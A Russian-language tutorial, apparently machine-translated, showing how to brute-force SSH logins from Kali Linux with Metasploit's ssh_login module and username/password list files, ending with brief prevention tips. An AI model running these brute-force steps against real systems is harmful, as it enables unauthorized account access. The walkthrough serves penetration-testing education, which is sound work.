Как использовать брутфорс SSH в Kali Linux?

Опубликовано: 25 Сентября, 2022

Протокол Secure Shell (SSH) — это криптографический сетевой протокол для безопасной работы сетевых служб в незащищенной сети. Его приложения — это удаленный вход в систему и выполнение из командной строки. Протоколы SSH основаны на архитектуре клиент-сервер, т.е. клиент SSH и сервер SSH.

В этой статье объясняется атака SSH Bruteforce. В этой статье мы будем использовать Kali Linux, потому что Kali в основном используется для расширенного тестирования на проникновение и аудита безопасности.

Прежде всего, для получения доступа к уязвимой машине нам нужен адрес машины или имя машины, то есть адрес ipV4. После этого нам потребуется имя пользователя и соответствующий ему пароль. Для этого сценария мы применяем атаку грубой силы, для имени пользователя и пароля мы создаем два разных текстовых файла: один для возможных имен пользователей и один для возможных паролей.

Для SSH-атак грубой силы в Kali Linux есть много приложений, например:

  • Метасплоит
  • Гидра

В этой статье мы будем использовать Metasploit.

Шаги для SSH Bruteforce Attack на уязвимой машине:

Шаг 1. Прежде всего, проверьте, правильно ли установлен Metasploit.

Шаг 2. Обновите и обновите Kali Linux:

apt-get update && apt-get upgrade

Шаг 3. Запустите в консоли следующую команду:

msfconsole

Выход :

Шаг 4. Запустите команду:

search ssh

Выход:

Шаг 5. Выберите этот вспомогательный файл ssh, введя следующую команду:

use auxiliary/scanner/ssh/ssh_login 

Шаг 6. Чтобы показать параметры, введите следующую команду:

show options

Выход:

Шаг 7 . Установите параметры столько, сколько у вас есть:

Например:

  • установить RHOSTS 192.168.XX.XX (адрес уязвимой машины)
  • установить PASS_FILE /root/Desktop/passwords.txt (путь к текстовому файлу паролей)
  • установить USER_FILE /root/Desktop/usernames.txt (путь к текстовому файлу с именами пользователей)
  • установите VERBOSE true (будет показана точно совпадающая комбинация имени пользователя и пароля)

Шаг 8 . Теперь, чтобы получить результат, введите следующую команду.

run

После запуска этой команды потребуется некоторое время, это зависит от размера файла. Поскольку это атака Bruteforce, она займет много времени и зависит от архитектуры вашей машины.

Если машина уязвима для этой атаки, вы получите сеанс ssh.

Предоставляя сеансы команд, он покажет вам запущенные задания и выберет из них.

Предотвращения атак SSH методом грубой силы:

  • Не используйте общие имена пользователей и пароли.
  • Используйте список разрешений и разрешайте доступ только тем пользователям, которым требуется доступ по SSH.
  • Не позволяйте root войти в систему.
  • Не слушайте каждый интерфейс.
  • Не разрешайте пароли ssh.
Picked Уязвимости

РЕКОМЕНДУЕМЫЕ СТАТЬИ

Количество чисел между L и R, взаимно простых с P
27 Февраля, 2023
Постройте матрицу, каждая строка и столбец которой содержат N и M единиц соответственно.
27 Февраля, 2023
Найдите все факторы заданного числа и их побитовое XOR
27 Февраля, 2023
Показать самое длинное имя
27 Февраля, 2023
Форматирование лицензионного ключа
27 Февраля, 2023
Когда я должен использовать список против LinkedList
27 Февраля, 2023
Реализовать быструю сортировку с первым элементом в качестве опорного
27 Февраля, 2023
Алгоритм хеш-сортировки
27 Февраля, 2023